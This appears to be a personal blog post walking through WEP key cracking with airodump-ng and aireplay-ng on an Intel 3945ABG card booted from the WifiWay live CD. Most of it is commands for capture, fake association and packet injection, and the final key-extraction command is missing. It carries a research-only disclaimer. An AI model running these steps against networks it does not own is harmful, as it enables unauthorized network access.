Based on a professional need, I had to demonstrate that WEP can be cracked. Even though I 'knew' this could be done, I never actually did it myself.
Note: This is only for researching, learning, and security checking purposes. This shouldn't be used to crack networks owned by other people. To attack and to vulnerate networks (or other resources) is bad, and illegal.
Doing some research, I found that my Sony Vaio VGN N350FE wireless card (an Intel 3945ABG), didn't allow certain things from linux, among them one necessary to demonstrate this vulnerability.
If you read my previous posts, you'll see that this is not the first problem I find with hardware.
Also it isn't the first I find a solution for :-)
I found a howto at http://foro.seguridadwireless.net/index.php?topic=3227.0 that I used as a base.
Next, the steps I followed to crack WEP.
We need a linux distribution availabe at http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. We download the CD image and we burn it.
We boot the notebook with WifiWay (it must be able to boot from optical drives).
Once started, we open the X:
We set the channel of the AP (Access Point) in the NIC.
echo 'CAPTURE_CHANNEL' > /sys/class/net/wifi0/device/channel
We get the BSSID, the channel and the ESSID.
We finish the execution with CONTROL-C, and we set the BSSID (an HEX number with 6 positions) in the NIC.
echo 'AP_BSSID' > /sys/class/net/wifi0/device/bssid
Once we do this, we start capturing.
airodump-ng -c CAPTURE_CHANNEL -w CAPTURE_FILE rtap0
We open a new window and we set speed at 2 mbps:
echo '2' > /sys/class/net/wifi0/device/rate
We activate the nic.
ifconfig wifi0 up
We look for our MAC address, it's the first 12 numbers stated in HWaddr
We initiate an association with the AP.
aireplay-ng -1 0 -a AP_BSSID -h MAC_ADDRESS_WIFI -e AP_ESSID wifi0
We open another terminal and we start injecting traffic:.
aireplay-ng -3 -b AP_BSSID -e AP_ESSID -h MAC_ADDRESS_WIFI wifi0
This should incremente the number of data in the capture window (it takes a while before it starts incrementing).
When we have over 100.000, we may extract the key by executing:
This should give us the key in hex format.
I hope this is useful to you.